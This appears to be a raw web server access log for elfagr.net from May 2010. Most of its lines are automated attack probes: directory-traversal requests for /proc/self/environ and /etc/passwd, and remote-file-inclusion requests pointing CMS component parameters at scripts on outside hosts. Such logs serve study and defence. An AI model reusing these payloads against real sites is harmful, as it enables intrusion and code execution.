91.198.32.224 - - [20/May/2010:09:45:29 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
91.198.32.224 - - [20/May/2010:09:45:20 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
91.198.32.224 - - [20/May/2010:09:45:55 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:46:54 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
115.69.159.213 - - [20/May/2010:09:48:16 -0700] "GET / HTTP/1.1" 200 1465 "-" "NokiaN73-1/4.0736.3.2.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "www.elfagr.net"
115.69.159.213 - - [20/May/2010:09:48:54 -0700] "GET /?D=A HTTP/1.1" 200 1465 "-" "NokiaN73-1/4.0736.3.2.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "www.elfagr.net"
115.69.159.213 - - [20/May/2010:09:49:05 -0700] "GET / HTTP/1.1" 200 1465 "-" "NokiaN73-1/4.0736.3.2.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "www.elfagr.net"
115.69.159.213 - - [20/May/2010:09:49:19 -0700] "GET /index_files/ HTTP/1.1" 200 7688 "-" "NokiaN73-1/4.0736.3.2.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "www.elfagr.net"
115.69.159.213 - - [20/May/2010:09:49:40 -0700] "GET /index_files/image568.gif HTTP/1.1" 200 383 "-" "NokiaN73-1/4.0736.3.2.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "www.elfagr.net"
115.69.159.213 - - [20/May/2010:09:49:55 -0700] "GET /index_files/image518.gif HTTP/1.1" 200 73 "-" "NokiaN73-1/4.0736.3.2.1 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1" "www.elfagr.net"
211.239.161.143 - - [20/May/2010:09:51:06 -0700] "GET ///?mosConfig_absolute_path=http://plik.interfree.it/id.jpg?? HTTP/1.1" 200 1466 "-" "libwww-perl/5.79" "elfagr.net"
211.239.161.143 - - [20/May/2010:09:51:06 -0700] "GET /logs////?mosConfig_absolute_path=http://plik.interfree.it/id.jpg?? HTTP/1.1" 200 5378 "-" "libwww-perl/5.79" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:51:26 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:51:27 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:51:36 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:51:46 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:53:01 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:52:52 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:52:53 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
88.191.94.188 - - [20/May/2010:09:54:04 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:09:53:55 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:09:54:04 -0700] "GET /logs/access_100128.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
91.198.32.224 - - [20/May/2010:09:54:43 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
91.198.32.224 - - [20/May/2010:09:54:43 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
91.198.32.224 - - [20/May/2010:09:54:34 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
88.191.94.188 - - [20/May/2010:09:55:29 -0700] "GET /logs/access_100304.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
213.92.118.159 - - [20/May/2010:09:58:59 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:58:59 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
213.92.118.159 - - [20/May/2010:09:59:08 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:07:54 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:07:54 -0700] "GET /logs/access_100211.log//akocomments.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:08:03 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:08:28 -0700] "GET /cropcanvas.php?cropimagedir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:08:28 -0700] "GET /logs//cropcanvas.php?cropimagedir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:08:28 -0700] "GET /logs/access_100204.log//cropcanvas.php?cropimagedir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:09:05 -0700] "GET /logs/access_100211.log//cropcanvas.php?cropimagedir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:13:28 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:13:28 -0700] "GET /logs/access_100401.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
88.191.94.188 - - [20/May/2010:10:13:28 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.245.220.19 - - [20/May/2010:10:21:20 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:21:11 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:21:12 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:21:33 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:21:33 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:21:33 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
87.119.196.31 - - [20/May/2010:10:23:44 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
87.119.196.31 - - [20/May/2010:10:23:36 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
87.119.196.31 - - [20/May/2010:10:23:36 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
87.119.196.31 - - [20/May/2010:10:25:07 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
121.88.4.141 - - [20/May/2010:10:27:01 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:27:34 -0700] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:27:34 -0700] "GET /logs////components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:27:34 -0700] "GET /logs/access.log%20%20////components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
41.239.78.143 - - [20/May/2010:10:27:57 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)" "www.elfagr.net"
41.239.78.143 - - [20/May/2010:10:27:58 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)" "www.elfagr.net"
121.88.4.141 - - [20/May/2010:10:28:03 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
121.88.4.141 - - [20/May/2010:10:28:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:28:04 -0700] "GET /logs/access.log%20%20////components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:28:04 -0700] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:28:04 -0700] "GET /logs////components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.88.4.141 - - [20/May/2010:10:28:05 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:32:59 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:33:49 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.251.10.117 - - [20/May/2010:10:38:01 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:10:38:01 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:10:38:10 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:38:05 -0700] "GET /logs/access.log////components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
175.107.158.230 - - [20/May/2010:10:39:05 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
175.107.158.230 - - [20/May/2010:10:38:56 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
175.107.158.230 - - [20/May/2010:10:39:06 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
216.245.220.19 - - [20/May/2010:10:39:06 -0700] "GET /logs/access.log////components/com_virtuemart/export.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:39:11 -0700] "GET /logs////components/com_virtuemart/export.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:39:11 -0700] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:39:20 -0700] "GET /logs/access.log%20%20////components/com_virtuemart/export.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:39:13 -0700] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:39:23 -0700] "GET /logs////components/com_virtuemart/export.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.94.188 - - [20/May/2010:10:39:23 -0700] "GET /logs/access.log%20%20////components/com_virtuemart/export.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.149.84.14 - - [20/May/2010:10:39:33 -0700] "GET /omponents/com_galleria/galleria.html.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.149.84.14 - - [20/May/2010:10:39:42 -0700] "GET /logs/omponents/com_galleria/galleria.html.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.149.84.14 - - [20/May/2010:10:39:42 -0700] "GET /logs/access.log%20%20/omponents/com_galleria/galleria.html.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.149.84.14 - - [20/May/2010:10:39:36 -0700] "GET /omponents/com_galleria/galleria.html.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.149.84.14 - - [20/May/2010:10:39:36 -0700] "GET /logs/omponents/com_galleria/galleria.html.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
218.149.84.14 - - [20/May/2010:10:39:36 -0700] "GET /logs/access.log%20%20/omponents/com_galleria/galleria.html.php?mosConfig_absolute_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.251.10.117 - - [20/May/2010:10:40:12 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
175.107.158.230 - - [20/May/2010:10:42:43 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:00:14 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
175.107.158.230 - - [20/May/2010:11:02:10 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.92.118.159 - - [20/May/2010:11:03:52 -0700] "GET /include/admin.lib.inc.php?site_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
213.92.118.159 - - [20/May/2010:11:04:01 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
213.92.118.159 - - [20/May/2010:11:04:01 -0700] "GET /logs/access_091105.log%20%20//include/admin.lib.inc.php?site_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
213.92.118.159 - - [20/May/2010:11:03:52 -0700] "GET /logs/access_091015.log%20%20//include/admin.lib.inc.php?site_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
212.59.6.16 - - [20/May/2010:11:07:19 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.59.6.16 - - [20/May/2010:11:07:28 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.59.6.16 - - [20/May/2010:11:07:28 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:07:39 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:07:39 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:07:39 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
62.44.82.61 - - [20/May/2010:11:10:36 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
89.35.219.220 - - [20/May/2010:11:10:47 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
175.107.158.230 - - [20/May/2010:11:10:54 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
175.107.158.230 - - [20/May/2010:11:11:03 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
175.107.158.230 - - [20/May/2010:11:11:04 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
62.44.82.61 - - [20/May/2010:11:12:14 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
62.44.82.61 - - [20/May/2010:11:12:05 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
62.44.82.61 - - [20/May/2010:11:12:06 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
114.108.177.125 - - [20/May/2010:11:12:33 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.177.125 - - [20/May/2010:11:12:24 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.177.125 - - [20/May/2010:11:12:24 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.177.125 - - [20/May/2010:11:12:42 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.177.125 - - [20/May/2010:11:12:42 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.177.125 - - [20/May/2010:11:12:42 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
187.45.193.159 - - [20/May/2010:11:13:26 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.35.219.220 - - [20/May/2010:11:13:56 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
89.35.219.220 - - [20/May/2010:11:13:47 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
89.35.219.220 - - [20/May/2010:11:13:48 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:14:55 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:14:55 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:11:15:04 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
187.45.193.159 - - [20/May/2010:11:17:37 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
